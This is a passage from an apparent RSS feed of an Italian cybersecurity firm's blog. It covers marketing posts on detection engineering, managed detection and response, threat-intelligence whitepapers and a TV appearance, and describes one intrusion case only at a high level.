      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAAsSAAALEgHS3X78AAAB5UlEQVR42lVR+2vTUBjNP2yFgSCumeBjoN3moyjrOifT3yYIG/jTpnP2lTZpkpubm6ZpXje5r7TdcP+B31oEhXMP54N77uF8V8sLnhVCLW5oKTLKYGSAkpclL1a8FnfXKCuZHI7R+VX//OKHg3wtLwWn9PT0LIwSWS0LWhqxGCbCTgXJxCgRZiKCjCcUMnjBJPInjkdGlo1JqAmh2oPpRn3r4YONnmFdV/NPWDyx5ntO1bCrD55641avHZVTPmcspbzkigFEBUJzE3bPvNWfbm/vvN3U67fXN8ce30fqCKs2Ui2kjkF46tBTXwMJdSA//wstpuJ+T+ov9mq12vvWAZiPkHhmVY/NqumCWX7G8lsogAG8ZP+ZuVDOJH6kb52cfGFqIUp+NpG77vy5s2x6i6Y3B+4n1W8pGJOw1PxfM+wwCKYkmCYZncFhkpCJ7XoWIjbyxzgYu9hyPNcjCBM/mFKuoHm2ekWD+62Ddr2+qev6y0YjzUuEg8ufvzrdfqc36PWNi++XvcGwb4w63YFhjBIfY3MYea5k4i45ilPLRubYcRCGMU6pT0L4uSjOgMMoniV5OEujKHbCdNcsdob01Vh0Y6lBOjSB1a+3vyoDxVWxagi8FlCHQyMqD8nyY7B8h5dXM/kHBCTqwlL8nCkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Halo PDF Certego&quot; title=&quot;&quot; src=&quot;/website/static/4c1f183dedfcbec02467177935007650/71c1d/Halo%20PDF%20Certego.png&quot; srcset=&quot;/website/static/4c1f183dedfcbec02467177935007650/804b2/Halo%20PDF%20Certego.png 384w,
/website/static/4c1f183dedfcbec02467177935007650/e5715/Halo%20PDF%20Certego.png 768w,
/website/static/4c1f183dedfcbec02467177935007650/71c1d/Halo%20PDF%20Certego.png 1536w,
/website/static/4c1f183dedfcbec02467177935007650/01294/Halo%20PDF%20Certego.png 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Luglio 2025]]></description><link>https://www.certego.net/blog/whitepaper-luglio-2025-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-luglio-2025-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Mon, 11 Aug 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di luglio 2025, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Personalizzare per proteggere meglio]]></title><description><![CDATA[Perché le regole di detection standard non possono bastare]]></description><link>https://www.certego.net/blog/detection-engineering-perche-le-regole-di-detection-standard-non-possono-bastare/</link><guid isPermaLink="false">detection-engineering-perche-le-regole-di-detection-standard-non-possono-bastare</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Mon, 28 Jul 2025 22:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;L&apos;importanza della Detection Engineering in un mondo di minacce dinamiche e in continua evoluzione&lt;/h2&gt;
&lt;p&gt;Le minacce informatiche oggi non sono più eventi isolati o facili da riconoscere. Al contrario, sono diventate sempre più sofisticate, subdole e capaci di adattarsi ai contesti più diversi. In uno scenario tanto mutevole, affidarsi esclusivamente a regole predefinite e generaliste per individuare attività malevole si rivela spesso insufficiente e rischia di lasciare aperti varchi importanti nella superficie d&apos;attacco.
Sebbene le regole standard offerte da molte soluzioni EDR rappresentino un buon punto di partenza, sono pensate per operare in contesti molto eterogenei e, di conseguenza, risultano inevitabilmente generiche. Le differenze organizzative, architetturali e persino culturali tra le aziende rendono questi rilevamenti una base iniziale fondamentale, ma che necessita di essere potenziata e adattata per garantire una protezione realmente efficace.&lt;/p&gt;
&lt;p&gt;Inoltre, in alcuni casi potrebbero non intercettare tecniche avanzate o comportamenti anomali specifici del contesto aziendale. I threat actor più esperti lo sanno bene: sfruttano queste limitazioni con approcci mirati, evasivi e meno convenzionali.
È qui che entra in gioco la Detection Engineering, che consente di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Creare rilevamenti personalizzati&lt;/strong&gt; sulla base delle specifiche esigenze infrastrutturali del cliente, tenendo conto di architetture, tecnologie e rischi peculiari;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integrare fonti di log specifiche&lt;/strong&gt;, anche non standardizzate;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Riconoscere anche segnali deboli&lt;/strong&gt;, ma contestualizzati e significativi;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automatizzare correlazioni complesse&lt;/strong&gt; tra eventi che hanno senso solo in quello specifico ambiente.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Non si tratta solo di scrivere regole, ma di progettare rilevamenti su misura che riflettono la specificità dell’ambiente tecnologico, organizzativo e operativo di ciascuna azienda. In un servizio MDR (Managed Detection and Response), questo approccio è fondamentale per intercettare minacce che sfuggono ai radar delle soluzioni standard&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Ogni infrastruttura è diversa: servono regole di detection uniche&lt;/h2&gt;
&lt;p&gt;Ogni azienda ha un proprio profilo di rischio, un proprio stack tecnologico e flussi operativi distinti. Una regola pensata per un ambiente sanitario, molto probabilmente non potrà avere la stessa efficacia in un contesto manifatturiero, e viceversa, proprio a causa delle differenze infrastrutturali.
Anche aziende dello stesso settore possono esporre superfici d&apos;attacco differenti a seconda degli strumenti adottati, delle configurazioni locali o della maturità dei processi IT. È qui che la Detection Engineering dimostra il proprio valore, permettendo di modellare regole che riflettano fedelmente il contesto operativo.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Il ruolo della Detection Engineering in un servizio MDR&lt;/h2&gt;
&lt;p&gt;In Certego, il team di Detection Engineering collabora ogni giorno con le unità di Incident Response e Threat Intelligence per trasformare evidenze tecniche e indicatori emersi sul campo in regole di rilevamento aggiornate ed efficaci. Ogni regola è progettata su misura per il contesto in cui verrà applicata, con l’obiettivo di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Estendere le capacità degli strumenti EDR&lt;/strong&gt;, andando oltre i rilevamenti standard;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Abilitare la visibilità su tecniche evasive o poco documentate&lt;/strong&gt;, spesso non tracciate dalle regole predefinite;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Aumentare la precisione, riducendo i falsi positivi&lt;/strong&gt;, grazie a una logiche di correlazione più consapevoli.&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;/br&gt;
## Un caso reale
Durante un&apos;attività di Incident Response su una compromissione in corso, il team di Security Operations di Certego ha analizzato un attacco in cui un attore malevolo era riuscito a ottenere un accesso iniziale sfruttando credenziali valide e un&apos;applicazione esposta su internet. Dopo l&apos;accesso iniziale, l&apos;attaccante ha avviato una serie di movimenti laterali utilizzando strumenti legittimi come PsExec e WMI per spostarsi all&apos;interno dell&apos;infrastruttura, mantenendo un basso profilo e confondendosi tra le attività legittime.
Durante la fase di post-analisi, sono stati raccolti indicatori specifici che includevano:
&lt;ul&gt;
&lt;li&gt;Sequenze anomale di autenticazioni RDP e SMB tra host non correlati tra loro;&lt;/li&gt;
&lt;li&gt;Esecuzione di servizi remoti tramite sc.exe e wmic all&apos;interno di subnet inconsuete;&lt;/li&gt;
&lt;li&gt;Utilizzo di comandi Powershell offuscati, con payload scaricati da URL temporanei.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Partendo da questi indicatori, il team di Detection Engineering ha progettato una regola personalizzata in grado di correlare questi pattern su ambienti simili, rilevando:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Tentativi di movimento laterale basati su tool nativi;&lt;/li&gt;
&lt;li&gt;Anomalie nel comportamento degli endpoint rispetto alla baseline abituale;&lt;/li&gt;
&lt;li&gt;Indicatori di persistenza remota poco rumorosi ma altamente sospetti.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;La regola è stata poi adattata e distribuita selettivamente nei contesti infrastrutturali affini, offrendo una protezione mirata contro attacchi stealth che sfruttano strumenti leciti per scopi illeciti.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Detection su misura: benefici tangibili&lt;/h2&gt;
&lt;p&gt;La personalizzazione non è un vezzo, ma un vantaggio strategico concreto per migliorare:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Accuratezza degli alert&lt;/strong&gt;: le regole sono adattate al contesto reale dell’azienda;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Efficienza del SOC&lt;/strong&gt;: meno rumore equivale a maggiore concentrazione sui segnali reali;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tempo di risposta&lt;/strong&gt;: l’identificazione precoce accelera la containment e l’analisi.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ogni incidente gestito contribuisce ad arricchire il set di detection con nuovi elementi contestuali, dando vita a un ciclo virtuoso di apprendimento.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Certego Halo: visibilità totale e detection personalizzata&lt;/h2&gt;
&lt;p&gt;Come abbiamo visto, le soluzioni EDR tradizionali sono spesso progettate per soddisfare esigenze standard e operare in modalità black-box: offrono regole predefinite, ma impediscono l’accesso diretto ai dati grezzi e alle logiche di rilevamento. Questo approccio limita profondamente la capacità di analisi da parte di analisti esperti, in particolare dei power user che necessitano di un controllo avanzato sul processo di detection.
Per risolvere queste limitazioni, Certego ha sviluppato Halo, una piattaforma di Detection Engineering integrata nell&apos;ecosistema applicativo proprietario che consente di raccogliere e arricchire l’intera telemetria degli endpoint, superando così le barriere imposte dalle soluzioni tradizionali. Con Halo, i team SOC possono:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Accedere alla telemetria completa degli endpoint&lt;/strong&gt; per effettuare analisi più approfondite;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Correlare eventi complessi in modo flessibile&lt;/strong&gt;, aggregando segnali deboli in un unico alert rilevante;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sviluppare regole di detection personalizzate&lt;/strong&gt;, liberandosi dai vincoli delle logiche chiuse;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Importare liberamente indicatori di compromissione (IOC) da qualsiasi fonte, senza limitazioni tecniche o restrizioni imposte da vendor terzi&lt;/strong&gt;, per arricchire la detection in tempo reale e con massima autonomia operativa.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In questo modo, Halo diventa uno strumento abilitante per una detection più precisa, tempestiva e contestualizzata. Per gli analisti di Certego, rappresenta l’ambiente ideale in cui applicare in modo efficace competenze avanzate, conoscenza del contesto operativo e threat intelligence, trasformando i servizi MDR di Certego in una soluzione realmente su misura per ogni cliente, capace di adattarsi alle sue specificità infrastrutturali, organizzative e di rischio.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;/website/adfa4215f2b58059906d0694d5bbff34/Halo - Unlimited Visibility - Generic.pdf&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAAsSAAALEgHS3X78AAAB5UlEQVR42lVR+2vTUBjNP2yFgSCumeBjoN3moyjrOifT3yYIG/jTpnP2lTZpkpubm6ZpXje5r7TdcP+B31oEhXMP54N77uF8V8sLnhVCLW5oKTLKYGSAkpclL1a8FnfXKCuZHI7R+VX//OKHg3wtLwWn9PT0LIwSWS0LWhqxGCbCTgXJxCgRZiKCjCcUMnjBJPInjkdGlo1JqAmh2oPpRn3r4YONnmFdV/NPWDyx5ntO1bCrD55641avHZVTPmcspbzkigFEBUJzE3bPvNWfbm/vvN3U67fXN8ce30fqCKs2Ui2kjkF46tBTXwMJdSA//wstpuJ+T+ov9mq12vvWAZiPkHhmVY/NqumCWX7G8lsogAG8ZP+ZuVDOJH6kb52cfGFqIUp+NpG77vy5s2x6i6Y3B+4n1W8pGJOw1PxfM+wwCKYkmCYZncFhkpCJ7XoWIjbyxzgYu9hyPNcjCBM/mFKuoHm2ekWD+62Ddr2+qev6y0YjzUuEg8ufvzrdfqc36PWNi++XvcGwb4w63YFhjBIfY3MYea5k4i45ilPLRubYcRCGMU6pT0L4uSjOgMMoniV5OEujKHbCdNcsdob01Vh0Y6lBOjSB1a+3vyoDxVWxagi8FlCHQyMqD8nyY7B8h5dXM/kHBCTqwlL8nCkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Halo PDF Certego&quot; title=&quot;&quot; src=&quot;/website/static/4c1f183dedfcbec02467177935007650/71c1d/Halo%20PDF%20Certego.png&quot; srcset=&quot;/website/static/4c1f183dedfcbec02467177935007650/804b2/Halo%20PDF%20Certego.png 384w,
/website/static/4c1f183dedfcbec02467177935007650/e5715/Halo%20PDF%20Certego.png 768w,
/website/static/4c1f183dedfcbec02467177935007650/71c1d/Halo%20PDF%20Certego.png 1536w,
/website/static/4c1f183dedfcbec02467177935007650/01294/Halo%20PDF%20Certego.png 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Conclusione&lt;/h2&gt;
&lt;p&gt;In un ecosistema dove le minacce mutano rapidamente e adottano tecniche di evasione sempre più sottili, la detection non può essere statica. Deve evolvere. Deve essere consapevole. &lt;strong&gt;E soprattutto, deve essere su misura&lt;/strong&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[State of cybersecurity - Gennaio - Giugno 2025]]></title><description><![CDATA[Il report realizzato da Certego per AUSED che analizza i trend di sicurezza delle aziende italiane nel primo semestre del 2025]]></description><link>https://www.certego.net/blog/whitepaper-state-of-cybersecurity-gennaio-giugno-2025/</link><guid isPermaLink="false">whitepaper-state-of-cybersecurity-gennaio-giugno-2025</guid><category><![CDATA[Whitepaper]]></category><pubDate>Sun, 27 Jul 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;State of Cybersecurity è la ricerca realizzata da Certego per AUSED – l’Associazione tra Utenti di Sistemi e Tecnologie dell’Informazione che raccoglie oltre duecento aziende italiane.&lt;/p&gt;
&lt;p&gt;L’obiettivo della ricerca, basata su un campione di 1.200.000 asset monitorati all’interno della piattaforma PanOptikon®, è confrontare i volumi di attacco del primo semestre del 2025, con lo stesso periodo del 2024, per indagare lo stato di sicurezza delle aziende italiane e le metodologie di attacco dei cyberciminali.&lt;/p&gt;
&lt;p&gt;Gli incidenti sono diventati più pericolosi? Quali sono le superfici di attacco più a rischio? Quali sono i settori maggiormente esposti? Qual è il rapporto tra falsi positivi e incidenti reali?&lt;/p&gt;
&lt;p&gt;Sono alcune delle domande a cui rispondiamo all’interno del report.&lt;/p&gt;
&lt;p&gt;Compila il form per ricevere il pdf.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego al TG5]]></title><description><![CDATA[Il nostro impegno quotidiano per la cybersicurezza]]></description><link>https://www.certego.net/blog/certego-al-tg5/</link><guid isPermaLink="false">certego-al-tg5</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Sun, 20 Jul 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Il 21 luglio, durante l’edizione delle 13:00 del TG5, abbiamo avuto il piacere di raccontare il nostro lavoro direttamente dalle telecamere del telegiornale nazionale. &lt;a href=&quot;https://mediasetinfinity.mediaset.it/video/tg5/edizione-ore-1300-del-21-luglio_F313645001080601&quot;&gt;Al minuto 22:13 del servizio disponibile a questo link&lt;/a&gt;, la troupe del TG5 ci ha fatto visita nella nostra sede di Modena per parlare di cybersicurezza e del nostro approccio alla difesa delle aziende italiane.&lt;/p&gt;
&lt;p&gt;A spiegare la visione di Certego sono stati &lt;strong&gt;Bernardino Grignaffini Gregorio&lt;/strong&gt; e &lt;strong&gt;Marco Giovanetti&lt;/strong&gt;, intervistati da Fabio Giuffrida: un’occasione preziosa per mostrare come il nostro modello di cyber defense proattiva, unito a un team altamente specializzato, sia la chiave per contrastare minacce sempre più evolute.&lt;/p&gt;
&lt;p&gt;Per noi è stato un momento di grande orgoglio: essere raccontati in un contesto così autorevole testimonia il valore del nostro impegno costante nella protezione del tessuto economico del Paese.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Proteggere (anche) senza fare rumore]]></title><description><![CDATA[Quando tutto tace, il tuo MDR sta lavorando eccome]]></description><link>https://www.certego.net/blog/certego-mdr-proteggere-anche-senza-fare-rumore/</link><guid isPermaLink="false">certego-mdr-proteggere-anche-senza-fare-rumore</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 02 Jul 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Un servizio MDR davvero efficace non si misura solo nei momenti di emergenza. Si misura &lt;strong&gt;nella continuità quotidiana&lt;/strong&gt;, quando tutto fila liscio, senza interruzioni, senza allarmi, senza imprevisti.
Quando un servizio MDR è progettato e gestito nel modo giusto, può succedere una cosa curiosa: &lt;strong&gt;sembra che non stia succedendo nulla&lt;/strong&gt;.
Nessun alert grave. Nessun incidente. Nessuna interruzione. Tutto scorre in modo fluido e silenzioso.
È in quel momento che un servizio gestito di Detection &amp;#x26; Response sta lavorando al meglio — &lt;strong&gt;senza farsi notare&lt;/strong&gt;.  Ed è proprio qui che si nasconde il valore reale.&lt;/p&gt;
&lt;h2&gt;Il successo silenzioso&lt;/h2&gt;
&lt;p&gt;Un servizio MDR è progettato per &lt;strong&gt;intercettare e neutralizzare&lt;/strong&gt; le minacce prima che possano avere un impatto. Se tutto fila liscio, non significa che non ci siano minacce. Significa che il sistema di protezione — persone, tecnologie, processi — sta lavorando in modo efficace, continuo e silenzioso.&lt;/p&gt;
&lt;p&gt;Un attacco andato a buon fine è visibile, rumoroso, costoso. Una minaccia intercettata in tempo, invece, viene bloccata nelle fasi iniziali della &lt;strong&gt;kill chain&lt;/strong&gt;: prima che possa muoversi lateralmente, esfiltrare dati o compromettere sistemi critici. Nessun impatto, nessuna escalation.&lt;/p&gt;
&lt;h2&gt;Non è solo questione di bloccare minacce&lt;/h2&gt;
&lt;p&gt;Spesso si tende a valutare la sicurezza solo in base al numero di eventi gestiti: quante minacce abbiamo rilevato? Quanti attacchi abbiamo bloccato? Quanti alert sono stati chiusi?
Ma la vera domanda dovrebbe essere: &lt;strong&gt;cosa abbiamo reso possibile, grazie alla sicurezza?&lt;/strong&gt; Perché la sicurezza si può valutare anche da un’altra prospettiva: non solo per ciò che blocca, ma per &lt;strong&gt;ciò che permette di far accadere senza ostacoli&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Vediamo alcuni esempi…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Un servizio MDR che rileva centinaia di tentativi malevoli ogni mese può sembrare solo un numero su un report… ma è esattamente ciò che consente, ad esempio alle linee produttive, di rimanere operative senza interruzioni.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Un mese senza incidenti può sembrare “niente da segnalare&quot;… ma significa che gli utenti hanno avuto accesso continuo ai servizi, senza disservizi né escalation.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Chiudere tutte le segnalazioni critiche entro SLA è importante… ma conta ancora di più se questo consente ai reparti aziendali di operare in continuità.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Aggiornare tutti i sistemi è fondamentale… ma il vero risultato è che nessuna vulnerabilità ha messo a rischio la supply chain durante il picco stagionale.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Quando la sicurezza funziona, il business può crescere. Innovare. Operare senza interruzioni. Portare a termine nuovi progetti. Mantenere la fiducia di clienti e partner.
Ecco perché un servizio di Managed Detection &amp;#x26; Reponse non è semplicemente una difesa: è un abilitatore strategico. Ti consente di fare di più, con più fiducia.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/quanto-costa-un-data-breach/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAC4jAAAuIwF4pT92AAACMUlEQVR42k2RS08TURzFZ+XSL+AHcGlMXBk1wSfgAk2sVCSiMUQxJixYaGJCjC4M0QWs6IoGgkRCC4WW0mqnlHbaDvRF53Hn0bkzcx8zHZrGz+BFEmNyFv+b3HPuub8/14HuZibPF0rbyXSt2cZeYCPqYO9UyKO0eyjrogR+9/qY+A6iLvb+ibNsVCyVgarl+TxQge8HlHgeZTYPYdoLeis54cLb2U+xtM5Sadf538wORaNb0r2qFQg6PTJwQUUFFQsarui4H5ysCrXzH+bPvfs2tpwogw7CLNc/i+A6Lo2UIdOKaC+WYazhRtkgwCLADZN0/eBXS13Y3Y9kDnaKFc3UVZdWAaTEZykc6yKA06fKGi4BdKCiEsCigQnxMKGsZ0XS57Zycwk+kuTXtxO5XDbT1nKK1XEJZzu43ZYkSW42j1UFNOpNRVHZh8+YEeK3TOdzVpxZiodmPl6+P3rvUXj26/xaoSpBxDGA4lGzVDmqiHWx1qoc1tuK7hL/jDYiHnTp8+mZxyO3R4ZuPBy69mp04M7Nq4ODd3eSqVOzAgwZ6JphtWXQaEmmCQntMh7o726Ck/5GPDY8FnowHh6fCL+ZevFk8vX18LPoRoKzXbL3s5DK5LeSWaFaY5dlSFWbGpajm5AJ2ogE/YXNzJWnU5eGQwOhiVsvpy9Ovo+k8hx08O4en87uJ5LZA+HQpYEEiQKpZtqsCzAsy8YMbO+kVz+Woz/ii8tri6vrX5a+89X6H7S8xwF2ZSwCAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Data Breach certego&quot; title=&quot;&quot; src=&quot;/website/static/31d83d81fc6ee9029413449c90fb44eb/71c1d/Data-Breach-certego.png&quot; srcset=&quot;/website/static/31d83d81fc6ee9029413449c90fb44eb/804b2/Data-Breach-certego.png 384w,
/website/static/31d83d81fc6ee9029413449c90fb44eb/e5715/Data-Breach-certego.png 768w,
/website/static/31d83d81fc6ee9029413449c90fb44eb/71c1d/Data-Breach-certego.png 1536w,
/website/static/31d83d81fc6ee9029413449c90fb44eb/a878e/Data-Breach-certego.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Lavora per te, senza rallentarti&lt;/h2&gt;
&lt;p&gt;Un servizio MDR efficace non si limita a intercettare le minacce in tempo: lo fa &lt;strong&gt;senza complicarti la vita&lt;/strong&gt;.
Gli analisti del provider MDR lavorano costantemente in background, supportati da tecnologie avanzate e threat intelligence, per monitorare gli ambienti IT, gestire gli eventi e neutralizzare gli incidenti prima ancora che abbiano impatto sulle tue attività.&lt;/p&gt;
&lt;p&gt;Il risultato? Nessuna interruzione, nessuna richiesta superflua, nessuna distrazione.&lt;/p&gt;
&lt;p&gt;È così che lavoriamo in Certego.
Il nostro servizio MDR è pensato per &lt;strong&gt;alleggerire il tuo carico operativo e coinvolgerti solo quando serve davvero&lt;/strong&gt;.
E quando serve il tuo contributo — perché qualcosa richiede una decisione o un&apos;azione condivisa — entra in gioco la piattaforma unificata di Security Operations, &lt;strong&gt;PanOptikon®&lt;/strong&gt;: un ambiente centralizzato che ti consente di collaborare in modo preciso, veloce e strutturato con il nostro team.&lt;/p&gt;
&lt;p&gt;Niente alert frammentati, niente flussi disorganizzati — solo interazioni mirate, gestite in modo efficiente, per intervenire insieme solo quando è necessario.
Il risultato? Meno tempo speso nella risposta agli incidenti, più focus su ciò che conta davvero.
Il tuo tempo resta protetto, esattamente come la tua infrastruttura.&lt;/p&gt;
&lt;h2&gt;Misurare ciò che non si vede: la reportistica di PanOptikon®&lt;/h2&gt;
&lt;p&gt;La sicurezza davvero efficace è spesso silenziosa. Ma silenziosa non significa invisibile.
Per questo la piattaforma PanOptikon® di Certego fornisce strumenti chiari per &lt;strong&gt;misurare il valore aggiunto che il servizio MDR porta ogni giorno&lt;/strong&gt;, anche quando tutto sembra tranquillo.&lt;/p&gt;
&lt;p&gt;Attraverso dashboard complete, intuitive e sempre aggiornate puoi, ad esempio:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Valutare l’impatto delle attività svolte, i rischi evitati e i miglioramenti ottenuti nella postura di sicurezza&lt;/li&gt;
&lt;li&gt;Monitorare l’esposizione delle tue risorse critiche e l’evoluzione del livello di rischio&lt;/li&gt;
&lt;li&gt;Analizzare nel dettaglio le minacce intercettate e neutralizzate prima che potessero causare danni&lt;/li&gt;
&lt;li&gt;Ottenere insight pratici per ottimizzare processi, controlli e strategie di difesa&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A tutto questo si affiancano le &lt;strong&gt;review periodiche&lt;/strong&gt; con i nostri customer specialist, che aiutano a leggere i dati in chiave strategica, &lt;strong&gt;trasformando le evidenze tecniche in decisioni consapevoli e azioni mirate&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Perché la sicurezza non è solo difesa. È valore abilitante, costruito giorno dopo giorno, in collaborazione.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/lummastealer/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
